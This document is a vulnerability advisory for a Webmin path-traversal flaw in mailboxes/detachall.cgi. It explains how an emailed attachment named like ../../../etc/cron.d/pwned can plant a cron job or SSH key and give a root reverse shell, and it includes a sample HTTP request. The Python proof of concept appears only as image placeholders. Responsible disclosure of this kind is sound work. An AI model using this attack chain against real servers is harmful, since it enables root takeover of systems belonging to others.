Vulnerability Description: CWE-24: Path Traversal: '../filedir'
Software Version: < 2.640
NIST: https://nvd.nist.gov/vuln/detail/CVE-2026-49103
CVSS: 9.4
Severity: Critical
Credits: Andrea Carlo Maria Dattola, Marco Ventura, Massimiliano Brolli
Webmin before 2.640 does not safely construct a filename for saving of an attachment within the mailboxes component. This occurs in mailboxes/detachall.cgi.
Prerequisites: An attacker, without any authentication, must know a valid webmin email that is able to “Read User Email”.
Step-by-step instructions and PoC
A remote user can send arbitrary emails to system users who have the “Read User Email” privilege enabled, including malicious attachments with arbitrary filenames, enabling Remote Code Execution (RCE) attacks. Successful exploitation of this vulnerability can allow an attacker to execute arbitrary commands with ‘root’ privileges on the server.
Specifically, when a victim is tricked into downloading attachments in “.zip” format, vulnerable system code is executed within the detachall.cgi component. This code fails to properly sanitize or escape path traversal sequences (../../../) contained in attachment filenames. As a result, an attacker can cause arbitrary files to be written to the underlying operating system with root privileges.
By crafting a malicious attachment with a controlled filename and payload—such as ../../../etc/cron.d/pwned—an attacker can write files to sensitive system directories and achieve arbitrary code execution, for example by creating a cron job that executes a reverse shell or other attacker-controlled scripts.
Affected Endpoints
• URL: https://[IP]:[PORT]/mailboxes/detachall.cgi/attachments.zip
• File: /usr/share/webmin/mailboxes/detachall.cgi
Attacker sends a crafted email to a Webmin user's address via SMTP (no authentication required on the mail server).
The malicious attachment's payload is a cron job definition or an SSH authorized_keys entry.
When the Webmin user opens the email and clicks 'Download all attachments', detachall.cgi writes the malicious payload to the traversed path (e.g. /etc/cron.d/) with the privileges of the Webmin process (root).
Within 60 seconds the cron daemon executes the payload, establishing a reverse shell as root.
Below is the evidence with the vulnerability details and the payloads used.
Image 2 - Safe User "test" with the only "Read User Email" privilege
Payload used to exploit vulnerability:
As a PoC please consider the following python code (mail2.py in the Figure belove) that send the malicious email (via SMTP) against the user with the Read User Email privilege inside the webmin application.
Image 3 - Image that show the successfully mail with 2 attachment sended to the victim
Image 4 - mail2.py
Image 5 - Email received correctly inside the webmin application
When the victim opens the email in Webmin and clicks 'Download all attachments'. The request generated is the following:
HTTP Request 1:
GET /mailboxes/detachall.cgi/attachments.zip?folder=0&idx=0&user=test HTTP/1.1
Host: 127.0.0.1:10000
Cookie: client_height=814; redirect=1; testing=1; sid=0da900b541b3331dc48f5352b0f3acd9
Referer: https://127.0.0.1:10000/mailboxes/view_mail.cgi
Image 6 - Image that show the download of the attachment.zip and the execution of the malicious code inside detachall.cgi
Security Impact
An attacker is able to perform an Arbitrary File Write (Path Traversal) that lead to Remote Code Execution (RCE) attacks. As a result, an attacker can execute arbitrary command with ‘root’ privileges on the server.
